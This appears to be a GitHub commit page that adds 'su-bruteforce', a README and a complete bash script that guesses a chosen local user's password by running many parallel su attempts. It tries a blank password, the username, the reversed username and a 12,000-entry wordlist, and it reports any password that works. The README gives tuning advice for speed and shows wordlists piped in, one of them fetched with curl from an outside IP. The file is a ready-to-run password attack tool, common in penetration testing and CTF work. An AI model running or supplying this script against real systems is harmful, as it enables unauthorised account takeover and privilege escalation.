Skip to content

Commit

Permalink
add su-bruteforce
Browse files Browse the repository at this point in the history
  • Loading branch information
@Mag1cByt3s
Mag1cByt3s committed Dec 22, 2024
1 parent 5ffc15b commit 83f0454
Show file tree
Hide file tree
Showing 3 changed files with 12,732 additions and 0 deletions.
21 changes: 21 additions & 0 deletions Bruteforce/su-bruteforce/README.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
# su-bruteforce

This tool **bruteforces a selected user** using `su` and as passwords: **null password, username, reverse username and a wordlist (top12000.txt).**

You can specify a username using `-u <username>` and a wordlist via `-w <wordlist>`.

By **default** the BF default speed is using 100 su processes at the same time (each su try last 0.7s and a new su try in 0.007s). It **needs 143s to complete**.

You can configure these times using `-t` (timeout `su` process) and `-s` (sleep between 2 `su` processes).

**Fastest recommendation**: `-t 0.5` (minimun acceptable) and `-s 0.003` ~ **108s to complete.**
```
./suBF.sh -u <USERNAME> [-w top12000.txt] [-t 0.7] [-s 0.007]
```

In addition to files, you can **pipe the output from other commands** to provide the wordlist, examples:

```bash
curl -s http://10.10.10.10/wordlist.txt | ./suBF.sh -u <USERNAME> -w -
seq 0 1000 | ./suBF.sh -u <USERNAME> -w -
```
66 changes: 66 additions & 0 deletions Bruteforce/su-bruteforce/suBF.sh
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,66 @@
#!/bin/bash

help="This tool bruteforces a selected user using binary su and as passwords: null password, username, reverse username and a wordlist (top12000.txt).
You can specify a username using -u <username> and a wordlist via -w <wordlist>.
By default the BF default speed is using 100 su processes at the same time (each su try last 0.7s and a new su try in 0.007s) ~ 143s to complete
You can configure this times using -t (timeout su process) ans -s (sleep between 2 su processes).
Fastest recommendation: -t 0.5 (minimun acceptable) and -s 0.003 ~ 108s to complete
Example: ./suBF.sh -u <USERNAME> [-w top12000.txt] [-t 0.7] [-s 0.007]
THE USERNAME IS CASE SENSITIVE AND THIS SCRIPT DOES NOT CHECK IF THE PROVIDED USERNAME EXIST, BE CAREFUL\n\n"

WORDLIST="top12000.txt"
USER=""
TIMEOUTPROC="0.7"
SLEEPPROC="0.007"
while getopts "h?u:t:s:w:" opt; do
case "$opt" in
h|\?) printf "$help"; exit 0;;
u) USER=$OPTARG;;
t) TIMEOUTPROC=$OPTARG;;
s) SLEEPPROC=$OPTARG;;
w) WORDLIST=$OPTARG;;
esac
done

if ! [ "$USER" ]; then printf "$help"; exit 0; fi

if ! [[ -p /dev/stdin ]] && ! [ $WORDLIST = "-" ] && ! [ -f "$WORDLIST" ]; then echo "Wordlist ($WORDLIST) not found!"; exit 0; fi

C=$(printf '\033')

su_try_pwd (){
USER=$1
PASSWORDTRY=$2
trysu=`echo "$PASSWORDTRY" | timeout $TIMEOUTPROC su $USER -c whoami 2>/dev/null`
if [ "$trysu" ]; then
echo " You can login as $USER using password: $PASSWORDTRY" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
exit 0;
fi
}

su_brute_user_num (){
echo " [+] Bruteforcing $1..."
USER=$1
su_try_pwd $USER "" & #Try without password
su_try_pwd $USER $USER & #Try username as password
su_try_pwd $USER `echo $USER | rev 2>/dev/null` & #Try reverse username as password

if ! [[ -p /dev/stdin ]] && [ -f "$WORDLIST" ]; then
while IFS='' read -r P || [ -n "${P}" ]; do # Loop through wordlist file
su_try_pwd $USER $P & #Try TOP TRIES of passwords (by default 2000)
sleep $SLEEPPROC # To not overload the system
done < $WORDLIST

else
cat - | while read line; do
su_try_pwd $USER $line & #Try TOP TRIES of passwords (by default 2000)
sleep $SLEEPPROC # To not overload the system
done
fi
wait
}

su_brute_user_num $USER
echo " Wordlist exhausted" | sed "s,.*,${C}[1;31;107m&${C}[0m,"
Loading

0 comments on commit 83f0454

Please sign in to comment.